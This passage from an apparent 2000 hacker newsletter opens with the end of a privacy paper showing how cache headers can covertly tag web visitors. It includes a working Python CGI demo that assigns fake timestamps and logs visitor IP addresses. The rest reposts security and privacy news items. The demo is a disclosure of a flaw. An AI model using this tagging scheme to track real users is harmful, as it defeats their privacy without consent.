safe. Junkbuster does not prevent tracking. anonymizer.com seems to keep a cache on their servers and rewrites the page as it passes through, so it seems to be safe: all anonymizer.com users appear as one. implications Anonymizing software should probably strip out all cache headers. Unfortunately this will slow down access and waste network bandwidth, but it seems necessary that the client should not return any information to the server if it is to preserve anonymity. Possibly Alice should ask her client to never refresh cached requests unless explicitly requested: this will maintain performance for the common case of unchanged pages. When the page must be refreshed, she should be careful that no information about the previously cached copy is emitted. If all of Alice's requests were directed through an anonymizing proxy crowd it would be harder to associate the tagged requests with her other activities, but not infeasible. Clients could try to manipulate the modification times to give Bob less room to move: for example, they could round off the time to the lowest minute, and could clip times to be no more than a year from the current date. But this still leaves several bits of the value under Bob's control: even separating users into equivalence classes based on where they first accessed this site might be interesting, for example. Designers of future protocols should consider similar tagging security issues. For example, although ETags allow better cache consistency problems than Last-Modified headers, they make tracking even easier by allowing the server to store arbitrary data on the client. references There was some discussion of problems with Last-Modified on the HTTP Working Group mailing list, but it seems they didn't identify the privacy problems. revision history 2000-03-28 Cleared up the explanation. 2000-03-29 Further revise the text after feedback from OzLabs hackers. Add Cache-Control headers to the demo to try to be more in the style of HTTP/1.1. Add a form through which users can record a string associated with their cache. Also keep track of how many times they have visited the page. Test against anonymizer.com and junkbuster. The code: #! /usr/bin/python # $Id: meantime.py,v 1.3 2000/03/29 05:47:03 mbp Exp $ # Copyright (C) 2000 by Martin Pool. # This software is provided 'as-is', without any express or implied # warranty. In no event will the authors be held liable for any damages # arising from the use of this software. # Permission is granted to anyone to use this software for any purpose, # including commercial applications, and to alter it and redistribute it # freely, subject to the following restrictions: # 1. The origin of this software must not be misrepresented; you must not # claim that you wrote the original software. If you use this software # in a product, an acknowledgment in the product documentation would be # appreciated but is not required. # 2. Altered source versions must be plainly marked as such, and must not be # misrepresented as being the original software. # 3. This notice may not be removed or altered from any source distribution. import cgi from os import environ import gdbm from sys import stdout, stderr from time import gmtime, asctime, ctime, time from string import find def nice_get(dict, key): if dict.has_key(key): return dict[key] else: return None def log(str): stderr.write(str + '\n') form = cgi.FieldStorage() datafile = gdbm.open('mtdata', 'c') method = nice_get(environ, 'REQUEST_METHOD') if method == 'POST': ims = form['tag'].value newvalue = form['newvalue'].value datafile[ims] = newvalue value = newvalue log('updated key %s to %s' % (ims, value)) else: # method == 'GET' i hope ims = nice_get(environ, 'HTTP_IF_MODIFIED_SINCE') if ims: log('got ims "%s"' % ims) # there might be extra parameters after the date such as the # length, but we ignore them pos = find(ims, ';') if pos > 0: ims = ims[:pos] value = nice_get(datafile, ims) log('retrieved value %s for key %s' % (`value`, `ims`)) else: next = int(nice_get(datafile, 'Next') or 0) next = next + 1 datafile['Next'] = str(next) ims = asctime(gmtime(next)) log('Generated new fake time %s' % ims) value = None if value is None: value = '%s:%s %s' % \ (nice_get(environ, 'REMOTE_ADDR') or 'Unknown', nice_get(environ, 'REMOTE_PORT') or 'Unknown', asctime(gmtime(time()))) datafile[ims] = value log('remembering value "%s" for key "%s"' % (value, ims)) count_key = ims + ';count' count = nice_get(datafile, count_key) if count is None: count = 1 else: count = int(count) + 1 datafile[count_key] = `count` datafile.close() stdout.write("HTTP/1.1 200 OK\r\n"); stdout.write("Content-Type: text/html\r\n"); stdout.write("Last-Modified: " + ims + "\r\n"); stdout.write("Cache-Control: private\r\n"); stdout.write("Cache-Control: must-revalidate\r\n"); stdout.write("\r\n"); stdout.write(""" """ % (count, ims, value)) cgi.print_environ() @HWA 165.0 HNN:Apr 3rd:Identity Theft On the Rise ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by royb Identity theft is on the rise, while not a new crime law enforcement officials credit the Internet with its rising popularity. (Glad to see the NY Times using words other than hacker to equate criminal.) NY Times http://www.nytimes.com/library/tech/00/04/biztech/articles/03theft.html (no article - pay site leeches - Ed) ---------- @HWA 166.0 HNN:Apr 3rd:Computer Crime Laws ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse An interesting site that lists the computer crime statutes for most of the 50 states and several countries. Lady Sharrow http://www.ladysharrow.com/Library/LAWS/ ---------- @HWA 167.0 HNN:Apr 4th:Computers Turned Into Bombs Via The Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Sean Arnold Yabenson, president of the Washington-based consumer group National CyberCrime Prevention Foundation (NCPF) claims that a purposely written email attachment can have the potential to change the electrical current and molecular structure of the central processing unit causing a violent explosion. (There is no date on this but this has to be an old April Fools joke.) Weekly World News http://www.weeklyworldnews.com/stories/1450.html ---------- (yeah you guessed it its a 404, probably not missing much either heh - Ed) @HWA 168.0 HNN:Apr 4th:GlassBook Knew of Vulnerabilities in King Book ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Glassbook, publisher of Stephen King's 66-page novella that was released for sale on-line, announced prior knowledge of security vulnerabilities in the applications used to read the book. Use of these insecure applications enabled piracy of the book. PC World http://www.pcworld.com/pcwtoday/article/0,1510,16009,00.html ---------- Hacking the Bullet The rush to release Stephen King's e-book compromised piracy safeguards. by Christine McGeever, Computerworld April 3, 2000, 9:09 a.m. PT Now that pirated versions of the popular 66-page electronic novella by Stephen King, "Riding the Bullet," have surfaced, the electronic book's distributor, Glassbook, will release a more secure version of its e-book reader. Glassbook President Len Kawall says that the updated version will be available next week, equipped with security features that should have been present for the King book release. But in the hurry to get the book out to market, a less robust reader was used. As a result, Kawall says, someone "chiseled in" to the content of the book after downloading and opening it in the reader. He adds that encryption technology used to transmit the book securely on the Internet was not compromised. However, the version of the book reader used with King's novella was vulnerable from the start, and both Glassbook and "Riding the Bullet" publisher Simon & Schuster knew it. Kawall says that Glassbook wanted to distribute the book with a reader that had 64-bit encryption, but couldn't make the publisher's deadline with the updated reader. In addition, the specification used to secure the book in transmission hasn't yet been formalized by the standards group behind it, the Book Industry Study Group. The Electronic Book Exchange specification hasn't been presented in a finished draft, nor has it been presented in any manner for industry review, according BISG spokesperson Sandra Paul. The BISG was formally announced on March 28, two weeks after the King book was released. Kawall adds that "Simon & Schuster absolutely understands" how a security breach could occur and that the industry "has learned to live with piracy." He cites the 400,000 to 500,000 legitimate copies of the book in distribution compared to what he estimates to be "a few" pirated copies. Adds Kawall, "It is not the end of e-books. Our job is to make it more pleasurable to purchase the product from a legitimate source." Meantime, Glassbook has announced the new reader and posted on its Web site "aggressive steps" it plans to take "to stem e-book privacy." The steps outlined include forming a full-time antipiracy support team that will search the Internet for pirated material, work with the publisher to remove illegally published material, and cooperate with the FBI and international authorities to monitor, track, and report suspected digital piracy and copyright infringement. @HWA 169.0 HNN:Apr 4th:Alabama Man Charged With 5k In Damage to ISP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Eric Brian Michael Jacobs, 23, of Mobile, Alabama was arraigned by U.S. Magistrate Bert W. Milling Jr. last Wednesday. He has been charged with knowingly transmitting "code and commands to the computer of an Internet Service Provider (ISP)" which resulted in more than $5,000 in damage. He faces a potential sentence of up to five years in federal prison and $250,000 in fines. Alabama Live http://www.al.com/news/mobile/Mar2000/28-a344051a.html ---------- Man faces charges of computer hacking 03/28/2000 By CHRISTINE HAUGHNEY Register Staff Reporter A former Eagle Scout and son of a former Mobile philanthropist faces federal charges for alleged computer hacking. Brian Michael Jacobs, 23, of Mobile was arraigned by U.S. Magistrate Bert W. Milling Jr. last Wednesday on charges that on May 16, 1999, he "knowingly transmitted code and commands to the computer of an Internet Service Provider (ISP)" which resulted in more than $5,000 in damage. The combined charges carry up to five years in federal prison and $250,000 in fines. In the computer world, Jacobs assumed the code name Blaxthos, court documents state. A 1995 Murphy High School graduate and Eagle Scout, Jacobs briefly attended Auburn University before leaving in March 1996. Jacobs was convicted on state charges in Lee County in 1996. But Ronald Myers, the former prosecutor on the case, said that he could not comment further on the charges because Jacobs was a youthful offender at the time. His father, Michael Jacobs, who had worked as executive director of the Medical Society of Mobile County Inc., died in 1997. Court documents list Jacobs as a "permanent" resident of Miami, Fla., where he is working. But a Mobile address also was listed in court documents. Milling, however, released him with the requirements that he "refrain from any use or unlawful possession of a narcotic drug and other controlled substances" and that he "undergo random urinalysis; also drug and alcohol treatment as deemed appropriate." At Wednesday's hearing, Jacobs' attorney, Arthur Madden, mentioned a dispute with the U.S. attorney's office about failing to provide documents it had against Jacobs. "The government has had eight months to get ready to do this," Madden told Milling. The court scheduled Jacobs' case for May. © 2000 Mobile Register. Used with permission. @HWA 170.0 HNN:Apr 4th:Federal Web Site Security Called Weak (Again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Members of the House cyber security team told lawmakers (again) on Monday that government web sites have weak security. An additional $250 million was requested to fund cyber security pilot programs at five agencies. A request was also made to exempt cooperating companies from the Freedom of Information Act when sharing proprietary information with the government following a cyber attack. (Freedom from FOIA will make absolutely no difference and will further erode the peoples' rights.) Governement Executive Magazine http://www.govexec.com/dailyfed/0400/040400b1.htm ---------- April 4, 2000 DAILY BRIEFING Federal Web site security called weak By Juliana Gruenwald, National Journal's Technology Daily While many of the government's computer systems are secure, federal agencies' Web interfaces with the public are the weakest links, two security experts told lawmakers Monday. Members of the House cybersecurity team and other lawmakers toured computer security firms in Northern Virginia Monday, including online security firm Global Integrity. Company President Dan Wooley and William Marlow, the company's executive vice president, also cited the need to provide companies with some exemption from the Freedom of Information Act to ensure that proprietary information that they share with the government about a cyberattack is not revealed. Reps. Tom Davis, R-Va., and James Moran, D-Va., are expected soon to introduce a bill addressing that issue. In the area of computer security, House cyber team leader J.C. Watts, R-Okla., chairman of the House Republican Conference, and four other House members sent a letter Friday to Rep. Harold Rogers, R-Ky., chairman of the House Appropriations Commerce, Justice and State Subcommittee, requesting that $250 million be appropriated to fund an information security pilot program at five agencies. The agencies include the Defense and State Departments and the Environmental Protection Agency, which has been criticized for its information security practices. "Governmentwide policies for the management of programs that support the cost-effective security of federal information systems remain inadequate," Watts wrote along with Davis and Reps. Pete Sessions, R-Texas, James Rogan, R-Calif., and Bill McCollum, R-Fla. Rep. Bob Goodlatte, R-Va., said he would like to see the Clinton administration hold an international summit on cybersecurity. If the administration fails to act, he suggested that Congress may have to pass a resolution urging the president to take such an action. "There's a great need for greater international cooperation" on the issue, Goodlatte said. On the tour, Wooley said denial of service attacks and damage to a company's reputation were the biggest potential losses for companies when they are attacked. An employee showed a group of lawmakers how a hacker might break into a bank Web site and potentially steal money from an account. @HWA 171.0 HNN:Apr 4th:Germans Propose Strike Force For Net Defense ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse A secret committee of the German government has released a study it has been working on for two years. The study concluded that Internet attacks will replace ground wars in the coming years. The group, which included several government groups warned that attacks could be targeted against military or civilian computer systems. The group also proposed a 'strike force' to help defend critical sites. (How does a 'strike force' defend anything?) ZD Net http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2504525,00.html?chkpt ---------- Germany eyes Web security After almost two years of study, a secret committee of the German government has concluded that Internet attacks will supplant military conflicts in the coming years, according to German magazine "Der Spiegel." The group, which encompasses several ministries, security forces and the chancellorship warned that attacks could interfere with sites belonging to the military as well as key civil institutions such as the police, power utilities and health services. "There is no more national territory" that can be defended militarily, the group reports; it went on to propose a "strike force" within the German federal office for security that could address attacks on critical sites. -- Susanne Rieger, ZDNet Germany; translation by Matthew Rothenberg, ZDNet News @HWA 172.0 HNN:Apr 4th:New Mags are Now Available. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by chri Issue 10 of Krash has been released. Rogue Transmission issue #3 is now available. Krash Rogue Transmission http://www.krash.org.uk http://www.geocities.com/solidex ---------- @HWA 173.0 HNN:Apr 5th:De Beers Releases Personal Info ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles adiamondisforever.com recently released the names, address, phone numbers and e-mail of over 35,000 customers. The web site, sponsored by De Beer's, is part of The Diamond Information Center (DIC). Site Administrators quickly fixed the hole that allow the information to be accessible. C|Net http://news.cnet.com/news/0-1007-200-1639327.html?tag ---------- @HWA 174.0 HNN:Apr 5th:CFP In Toronto ~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The Tenth Computers Freedom and Privacy conference got underway yesterday in Toronto Canada. Anonymity on the Internet is one of this years hottest topics. The Computers Freedom and Privacy Conference PC World http://www.cfp2000.org/ http://www.pcworld.com/pcwtoday/article/0,1510,16043,00.html ---------- Can Net Infrastructure Protect Privacy? Privacy conference panelists debate control implications of domain name system. by Rebecca Sykes, IDG News Service April 4, 2000, 3:45 p.m. PT As the world grapples with how and whether to control the Internet, a model surfaced at the Computers, Freedom, and Privacy conference held in Toronto this week to let control--and individuals' civil liberties--flow not from legislation but from the Net's infrastructure itself. "We're trying to use technology to build a civil-liberties infrastructure," says Lenny Foner of the Media Lab at Massachusetts Institute of Technology. One sticky Internet issue with control implications is the domain name system, which provides the human-friendly monikers such as "Amazon.com" and their corresponding numerical Internet Protocol addresses. "Whoever gets to decide who receives the names gets to decide, in a sense, how visible" people and companies are on the Internet, MIT's Foner says. Currently the company most associated with the domain name system, Network Solutions, manages top-level domain servers, including .com, .net, and .org, under a four-year contract awarded last November by the U.S. Department of Commerce. The Herndon, Virginia-based Network Solutions is not the sole naming player in the system, but the vendor's clout is evident from the $21 billion stock deal that VeriSign worked out last month to acquire Network Solutions. Thwarting the Squatters Panelists contemplated how to confound that near-centralized control of the Net while retaining its operational value. One possibility would be to permit multiple names, Foner says. Such a move would cut into the power of an organization to grant the name and would also thwart "land grabs," where squatters purchase all possible permutations of a company's name, Foner adds. An initial search for a specific company's Web site using the current convention, for example, "ibm.com," might list multiple, dramatically different sites. However, once the IBM site was reached, its location could be cached on the user's computer, so that a second query on "IBM" would quickly bring the user to that same site, according to Foner. But one panelist was concerned that relying on caches was not in keeping with the way people use computers. Increasingly, users access the Internet from many sources, not from just their home or work PC, says Lance Cottrell of Anonymizer.com. "People will have an expectation that, if they've always typed in one name to get to a place," they will always be able to use that name, Cottrell says. Another panelist said that a system in which names were not unique would never pass muster with powerful electronic commerce players. "They're going to hate the idea that a user could type in 'AT&T' or 'British Telecom'" and not get to those corporate sites, says Jonathan Weinberg of Wayne State University. "Major e-commerce players are not going to use this." Important e-commerce companies are not the only ones who value having unique and easily reachable names, according to Phil Zimmermann, the creator of the encryption software Pretty Good Privacy. "I would like to be able to know that if I type in 'barnesandnoble.com' that I get Barnes and Noble," Zimmermann says. @HWA 175.0 HNN:Apr 5th:Enigma Machine Stolen From Museum ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The Abwehr Enigma G-312 was stolen from its resting place in a glass display case at Bletchley Park Trust on April 1st. This specific variant of the machine is said to be one of only two known to exist. Cryptographers around the world are hoping that this is some sort of cruel April Fools joke and that the machine will soon be returned. Updated Information on the Stolen Machine Wired http://home.cern.ch/~frode/crypto/BPAbwehr/Abwehr_theft.html http://www.wired.com/news/politics/0,1283,35409,00.html ---------- Go to the first url for neat pics and technical data on the enigma - Ed Wired; Cryptos Try to Solve Enigma Crime by Lynn Burke 3:00 a.m. Apr. 5, 2000 PDT Whoever stole the rare, World War II secret decoder known as the Abwehr Enigma is going to have a tough time selling it on the online black market. That’s what cryptology enthusiasts are saying after the famous decoding machine used during the war to protect German secret messages was taken from its home in a glass display case at Bletchley Park Trust in London on April 1. "We hope that if the Internet community gets behind it, it will be impossible to sell the machine on the public market," said Christine Large, the trust's director. Because the machine was stolen on April Fool's day, trust officials say its theft may have been a prank. "If it was just an April Fool, we hope our Abwehr Enigma turns up soon," Large said. But as long as the decoder remains at large, active cryptologists who revere the analog antique are getting the word of its disappearance out over the Web, hoping to catch a thief who might try and sell the item online. Leading the effort is the Crypto Simulation Group, a small group of cryptologists who specialize in the Enigma machines. "In addition to our normal activities in cryptologic research, we have set up Web pages ... to broadcast to as large a base as possible the features of this rather unique piece of historical cipher equipment in the hope that the thieves will be caught in the act of attempting to dispose of it," said David Hamer, one of the group's members. Hamer, a retired historian living in New Jersey and one of the world's foremost Enigma experts, said it's important to rescue the machine because it is one of only two of its kind known to still exist. The other one is housed in the National Cryptologic Museum at Fort Meade, Maryland. According to a spokesman at the museum, 200 "G" Enigmas were issued to the German army high command during World War II for an unknown "special purpose." But no one seems to know where most of those have ended up, making the stolen machine all the more valuable. "This Abwehr Enigma is a close to unique variant," and it's likely to be worth quite a sum of cash, Hamer said. "Even standard service Enigmas are rare enough to command prices in the tens of thousands of dollars," he said. Since the announcement of the theft, several sites dedicated to cryptology have added a link to this urgent message about the machine's theft. Message boards have been frenetic with hundreds of postings about the machine's theft. The decoder, which looks like little more than an old-fashioned typewriter with a counter above the keyboard that resembles a car odometer, was given to the museum in 1998 by Britain's intelligence agency, the Government Communications Headquarters. According to the U.S. National Security Agency, cryptology was key to the success of the Allies in World War II. "Information from decrypted Enigma messages (not necessarily the Abwehr) was used time after time to outmaneuver German forces," said NSA spokeswoman Judi Emmel. "Losing this Enigma is a significant loss to the historic record of World War II cryptology." @HWA 176.0 HNN:Apr 5th:Thailand Police Form Cyber Crime Panel ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench A Committee for the Suppression of Computer Crimes has been formed by the Police Information System Centre to fight crimes involving technology including those committed on the Internet. Besides Police officers the committee also has members from local ISPs, the National Electronics and Computer Technology Centre (Nectec), security profesionals and the Telephone Organization of Thailand. News Bytes http://www.newsbytes.com/pubNews/00/146912.html ---------- The page or story you have requested is available to subscribers only! (Eat me. - Ed) @HWA 177.0 HNN:Apr 5th:40 Percent of Chinese Web Sites Attacked ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench An official Chinese government survey quoted by China Daily revealed that 40 percent of Chinese web sites have suffered online attacks. The State Council Development Research Center conducted a survey of 300 Internet firms. 44 percent said that some of the information has been tampered with and 40 percent claimed to have suffered an online malicious attack. Agence France Presse - via Inside China Today http://www.insidechina.com/news.php3?id ---------- (I dunno, I couldn't find the story among that mess you try looking for it ... -Ed :-/ ) @HWA 178.0 HNN:Apr 6th:DoubleClick Wins Privacy Award ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The Computers, Freedom, and Privacy conference being held this week in Toronto Canada has awarded DoubleClick the prestigious corporate invader award. Other winners included Commerce Secretary William Daley who won the award for worst government official and credit reporting firm Transunion received the lifetime menace award. Computers, Freedom, and Privacy conference Wired http://www.cfp2000.org http://www.wired.com/news/politics/0,1283,35432,00.html ---------- DoubleClick Wins for Losing by Declan McCullagh 3:00 a.m. Apr. 6, 2000 PDT TORONTO -- Say what you will about liberal privacy advocates, but they sure do know how to have a good time. Four of them dressed up as malicious characters from the Star Wars and Austin Powers movies to hand the second annual "Big Brother" awards to miscreant government agencies and large corporations on Wednesday evening. The bald director of Privacy International, Simon Davies, was a near-perfect Dr. Evil and master of ceremonies during the Computers, Freedom, and Privacy conference. The winner of the corporate invader award: DoubleClick, a company whose now-legendary privacy missteps drew fire earlier this year. Commerce Secretary William Daley won the worst government official award, beating out the Federal Trade Commission. The Commerce Department has hosted direct marketing conferences and oversees U.S. export controls of encryption technology. "We had a very tough time determining who would have the lifetime achievement menace award," said Dave Banisar, a fellow at the Electronic Privacy Information Center. "To truly be a lifetime menace, you can't just be a flash in the pan. DoubleClick has only been around for a few years." An anonymous CFP conference-goer costumed as Star Wars' Darth Vader accepted the award on behalf of credit reporting firm Transunion to applause from the roughly 150-person audience. Oddly enough, Transunion beat out the National Security Agency, which championed the government-backdoored Clipper chip in the early 1990s and spent decades trying to stifle academic encryption research in the United States. Winners of the pro-privacy Brandeis Award, named after U.S. Supreme Court Justice Louis Brandeis, included Beth Givens of the Privacy Rights Clearinghouse, and Richard Smith, who regularly exposes privacy violations in consumer software products. Previous Big Brother winners have included Microsoft and the FBI. The CFP conference continues through Friday. @HWA 179.0 HNN:Apr 6th:ACLU Appeals CPHack Ruling ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench Last weeks ruling concerning CPHack by U.S. District Judge Edward Harrington was extremely vague and is now being appealed by the ACLU. CPHack revealed the list of web sites blocked by Cyber Patrol as well allowed people to circumvent its blocking capabilities. The courts decisions prevented people from linking to the software, the ACLU is charging that the US does not have the power to regulate the global internet. Copy of Judge's Order Wired http://www.politechbot.com/cyberpatrol/final-injunction.html http://www.wired.com/news/business/0,1367,35464,00.html ---------- @HWA 180.0 HNN:Apr 6th:MPAA Attempts to Get Ruling Against Linking ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Macki The Motion Picture Association of America has now filed an injunction telling 2600 magazine what they can and can not link to via their web site. Primarily they are no longer allowed to link to sites that host copies of the DeCSS. 2600.com Wired http://www.2600.com/news/2000/0406.html http://www.wired.com/news/politics/0,1283,35394,00.html ---------- @HWA 181.0 HNN:Apr 6th:Enigma Suspect Busted ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by whitevampire Police have arrested and released on bail an unidentified English man for the theft of the Abwehr Enigma machine. The machine was recently stolen from the museum at Bletchley Park Trust. It has been valued at $150,000 but to many it is priceless. Police are still searching for the machine itself. More information on the Machine Wired Reuters - via Yahoo http://home.cern.ch/~frode/crypto/BPAbwehr/Abwehr_theft.html http://wired.com/news/politics/0,1283,35433,00.html http://dailynews.yahoo.com/h/nm/20000405/od/machine_1.html ---------- @HWA 182.0 HNN:Apr 6th:FBI and Privacy Advocates Square Off in Debate ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by darkscent Privacy advocates and Paul George, supervisory special agent for the Michigan bureau of the FBI faced off during the 10th Annual Computer, Freedom & Privacy Conference in Toronto, Canada. George had quite a few memorable things to say "There are worse things than having your privacy violated ... like murder.", "If there is going to be a Big Brother in the United States, it is going to be us -- the FBI", and "In order to prevent crime, information has to be collected... if justified." ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2522568,00.html?chkpt ---------- FBI agent: I am Big Brother Pro-privacy groups might consider him 'the enemy,' but Paul George counters: 'There are worse things than having your privacy violated ... like murder.' By Robert Lemos, ZDNet News UPDATED April 6, 2000 10:36 AM PT TORONTO -- Can effective law enforcement and personal privacy coexist? Law enforcement officials and privacy advocates faced off in a panel discussion Wednesday over the issue of the trade-offs between security and privacy at the 10th annual Computer, Freedom and Privacy 2000 Conference in Toronto. "There are reasons law enforcement should and does have the power to arrest and to search," said Paul George, supervisory special agent for the Michigan bureau of the FBI. "There are worse things than having your privacy violated ... like murder." George debated fiercely, but politely, with privacy advocates on the need for privacy invasive investigative techniques -- such as wiretaps, searches and Internet tracking -- to fight crime. In fact, recognizing that many at the conference consider him to be "the enemy," George called himself "the Big Brother in Michigan." 'If there is going to be a Big Brother in the United States, it is going to be us. The FBI.' -- FBI Supervisory Special Agent Paul George Few here doubt that privacy has been a casualty of the steady drive toward computerization and the Internet economy. While corporations -- such as RealNetworks Inc. (Nasdaq: RNWK), DoubleClick (Nasdaq: DCLK), Intel Corp. (Nasdaq: INTC) and Microsoft Corp. (Nasdaq: MSFT) -- have increasingly been taken to task for invading citizens' privacy on the Internet, law enforcement and the government continue to be a major worry for privacy advocates. Surveillance on the rise Domestic surveillance is rising. In 1999, police officers searched for individuals in the National Crime Information Center database 2 million times daily, up from the 600,000 daily transactions averaged in 1988. Likewise, wiretaps are expected to rise more than 300 percent in the next 10 years, according to the 2001 FBI budget request. The trends will only get worse, as technology lowers the barriers that face law enforcement surveillance, said Thomas M. Cecil, a superior court judge for the county of Sacramento, Calif. "In reality, most of what we have is the illusion of openness. Today, we have de facto privacy policy because we are inefficient; probing and gathering are time consuming and expensive. That protects our privacy," he said. Jim X. Dempsey, senior staff council for the technology-policy think tank Center for Democracy and Technology and a member of the panel, agreed, adding that more efficient data collection makes a privacy policy that much more critical. "As the technical hurdles are solved, then legal limitations need to be put in place to limit the (invasion of privacy) of citizens," he said. While Dempsey said he believed that privacy and citizen safety could coexist, the FBI's George upheld the common wisdom that they cannot. "I don't know how (others) can say that there is no price to privacy or price to security in this equation," he said. "In order to prevent crime, information has to be collected ... if justified." Everyone a potential suspect? Yet, without proper regulations about when and how data can be collected, such an assertion makes everyone a suspect, said Jason Catlett, president of privacy information firm Junkbusters Inc., who takes a dim view of current practices. "It's like they are saying that we have a lot of robbers, so in order to protect the banks -- rather than make them more secure -- they are requiring the identity of everyone who walks in front of banks." The FBI's George realizes where the FBI's push for more surveillance powers puts the agency: "If there is going to be a Big Brother in the United States, it is going to be us -- the FBI," he said. @HWA 183.0 HNN:Apr 6th:DDoS Attacks Contributed to Stock Market Losses ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles In an effort to get even more laws passed to protect our nations '6critical'9 infrastructure, Sen. Jon Kyl, R-Ariz. said that the recent DDoS `` attacks contributed to a 258-point drop in the Dow Jones Industrial Average and halted a string of three days of consecutive record- high closes of the technology-laden Nasdaq Composite Index.'' Kyl is currently co-sponsoring S. 2092 which will allow national tap and trace orders for law enforcement. (Contributed? Notice he didn'9t mention how much they contributed. Talk about a scare tactic.) San Francisco Chronicle http://www.sfgate.com/cgi-bin/article.cgi?file ---------- Item Not Found (sigh - Ed) @HWA 184.0 HNN:Apr 6th:History of the L0pht, Part 1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by nonentity Oxblood Ruffin, from the Cult of the Dead Cow, has released the first of a two part series that covers the formation and early history of L0pht Heavy Industries. Many of these details have not been published before. National Post http://www.nationalpost.com/financialpost.asp?f ---------- bad url @HWA 185.0 HNN:Apr 7th:Junger wins in Appeals Court - Code Declared Speech ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Dan The 6th Circuit Appeals Court has overturned a lower court ruling and has concluded that the First Amendment does in fact protect computer source code. Therefore they have remanded Peter Junger's case over encryption exports back to the District Court for further consideration. 6th Circuit Court Opinion Associated Press - via World News http://pacer.ca6.uscourts.gov/cgi-bin/getopn.pl?OPINION http://www.worldnews.com/?action ---------- @HWA 186.0 HNN:Apr 7th:Bullet to Scan Hard Drives of Web Site Visitors ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse Code-named Bullet and developed by ISS, this new software lets e-commerce companies scan a Web site visitor's hard drive to see if it is infected with Trojan horses, viruses or other malicious software that could be passed on to the e-commerce site. Few details about the program are available, the release date and pricing has not yet been announced. (Are companies going to warn users before they scan them?) CNN http://www.cnn.com/2000/TECH/computing/04/06/scan.visitors.idg/index.html ---------- Frisking computers at the door From... April 6, 2000 Web posted at: 8:53 a.m. EDT (1253 GMT) by Ellen Messmer (IDG) -- ISS has developed an intrusion-detection application, code-named Bullet, that lets e-commerce companies scan a Web site visitor's PC to see if it is infected with Trojan horses, such as Back Orifice, or viruses that could be passed on to the e-commerce site. Trojan horses let intruders seize remote control of PCs, and that could mean a compromise of an online banking system, for example, even when the correct user identification is employed to access the site. "Businesses are just getting fed up with the crap coming off the Internet," says ISS CEO Thomas Noonan, adding that one bank is expected to announce it is using the ISS application on its home banking site this week. The ISS application uses ActiveX technology to scan the laptop, and if required, wipe out the unwanted, dangerous code. Noonan acknowledges that use of the scanning application could touch off an invasion-of-privacy debate. Further details about the application were not available. ISS has not announced when the application will become generally available or how much it will cost. @HWA 187.0 HNN:Apr 7th:Links to Web Sites Illegal ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The Osaka District Court has ruled that under certain conditions linking one web site another would violate the law. While slightly vague it would seem that simply linking to a site that violates the law could be charged as aiding and abetting a crime. Asia Biz Tech http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID ---------- Error The Reason: CID$B$N@_Dj$,4V0c$C$F$$$^$9!#%F%s%W%l!<%H$r3NG'$7$F2<$5$$(B (Can you dig it? - Ed) @HWA 188.0 HNN:Apr 7th:British Companies Complacent ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse A study by the Department of Trade and Industry in Britain finds that British business are too complacent when it comes to online security. The Information Security Breaches Survey 2000 (ISBS 2000) found that 60% of companies have suffered a security breach and that 30% do not feel they have anything worth protecting. It was also found that the average costs of each intrusion was only Ł20,000. The study will be released at Infosecurity Europe 2000 on 11 April at Olympia in London. The UK Register 